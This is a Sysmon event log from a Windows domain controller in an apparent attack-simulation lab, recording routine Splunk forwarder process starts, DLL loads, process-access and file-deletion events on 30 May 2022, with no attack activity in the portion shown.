13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000098360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 
734700x800000000000000098356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778trueSplunk, Inc.Valid 10341000x800000000000000098354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:02:51.229{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:02:51.229{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:02:51.229 | SourceProcessGUID: {326FD73D-A252-6294-0500-000000005502} | SourceProcessId: 416 | SourceThreadId: 1908 | SourceImage: C:\Windows\system32\csrss.exe
  TargetProcessGUID: {326FD73D-C07B-6294-2D0B-000000005502} | TargetProcessId: 5236 | TargetImage: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
  GrantedAccess: 0x1fffff
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98349 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:51.229
  SourceProcessGUID: {326FD73D-A44C-6294-0501-000000005502} | SourceProcessId: 5164 | SourceThreadId: 6008 | SourceImage: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  TargetProcessGUID: {326FD73D-C07B-6294-2D0B-000000005502} | TargetProcessId: 5236 | TargetImage: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
  GrantedAccess: 0x1fffff
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 1 | Version 5 | Level 4 | Task 1 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98348 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:51.229
  ProcessGuid: {326FD73D-C07B-6294-2D0B-000000005502} | ProcessId: 5236 | Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
  FileVersion: 8.2.5 | Description: Registry monitor | Product: splunk Application | Company: Splunk Inc. | OriginalFileName: splunk-regmon.exe
  CommandLine: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe" | CurrentDirectory: C:\Windows\system32\
  User: NT AUTHORITY\SYSTEM | LogonGuid: {326FD73D-A253-6294-E703-000000000000} | LogonId: 0x3e7 | TerminalSessionId: 0 | IntegrityLevel: System
  Hashes: MD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778
  ParentProcessGuid: {326FD73D-A44C-6294-0501-000000005502} | ParentProcessId: 5164 | ParentImage: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe | ParentCommandLine: "C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service

EventID 23 | Version 5 | Level 4 | Task 23 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98491 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.682
  ProcessGuid: {326FD73D-A45C-6294-5601-000000005502} | ProcessId: 6368 | User: NT AUTHORITY\SYSTEM | Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename: C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes: MD5=BD4E298B48412F2302A47A1717A76747,SHA256=F83D41BE0E9F9FD8390B829AD83B76786834C65303BA8BE2B23B698869E92ED5,IMPHASH=00000000000000000000000000000000 | IsExecutable: false | Archived: false - insufficient disk space

EventID 23 | Version 5 | Level 4 | Task 23 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98490 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.666
  ProcessGuid: {326FD73D-A45C-6294-5601-000000005502} | ProcessId: 6368 | User: NT AUTHORITY\SYSTEM | Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename: C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes: MD5=DFD156FF2BEB9140D044A260152F4220,SHA256=3D2B1D12479E0AAB5184FEEBA581E2B61A379CE09688EE6FFFDB1C6863CCCA8A,IMPHASH=00000000000000000000000000000000 | IsExecutable: false | Archived: false - insufficient disk space

EventID 23 | Version 5 | Level 4 | Task 23 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98489 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.666
  ProcessGuid: {326FD73D-A45C-6294-5601-000000005502} | ProcessId: 6368 | User: NT AUTHORITY\SYSTEM | Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename: C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes: MD5=5AFDE6E10DDB25C445D5CC2421ED695B,SHA256=91ADF5844BFA6BB1CCBACF3C76CCB1203DFE40B931AF8242593DBCA071C71F8C,IMPHASH=00000000000000000000000000000000 | IsExecutable: false | Archived: false - insufficient disk space

EventID 7 | Version 3 | Level 4 | Task 7 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98488 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.244
  ProcessGuid: {326FD73D-C07C-6294-2E0B-000000005502} | ProcessId: 5532 | Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
  ImageLoaded: C:\Windows\System32\kernel.appcore.dll | FileVersion: 10.0.14393.2312 (rs1_release.180607-1919) | Description: AppModel API Host | Product: Microsoft® Windows® Operating System | Company: Microsoft Corporation | OriginalFileName: kernel.appcore.dll
  Hashes: MD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667D | Signed: true | Signature: Microsoft Windows | SignatureStatus: Valid

EventID 7 | Version 3 | Level 4 | Task 7 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98487 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.244
  ProcessGuid: {326FD73D-C07C-6294-2E0B-000000005502} | ProcessId: 5532 | Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
  ImageLoaded: C:\Windows\System32\dbgcore.dll | FileVersion: 10.0.14321.1024 (debuggers(dbg).210127-1811) | Description: Windows Core Debugging Helpers | Product: Microsoft® Windows® Operating System | Company: Microsoft | OriginalFileName: DBGCORE.DLL
  Hashes: MD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2E | Signed: true | Signature: Microsoft Windows | SignatureStatus: Valid

EventID 7 | Version 3 | Level 4 | Task 7 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98486 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.244
  ProcessGuid: {326FD73D-C07C-6294-2E0B-000000005502} | ProcessId: 5532 | Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
  ImageLoaded: C:\Windows\System32\dbghelp.dll | FileVersion: 10.0.14321.1024 (rs1_release.160715-1616) | Description: Windows Image Helper | Product: Microsoft® Windows® Operating System | Company: Microsoft | OriginalFileName: DBGHELP.DLL
  Hashes: MD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBE | Signed: true | Signature: Microsoft Windows | SignatureStatus: Valid

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98485 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98484 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98483 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98482 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98481 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98480 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98479 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98478 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
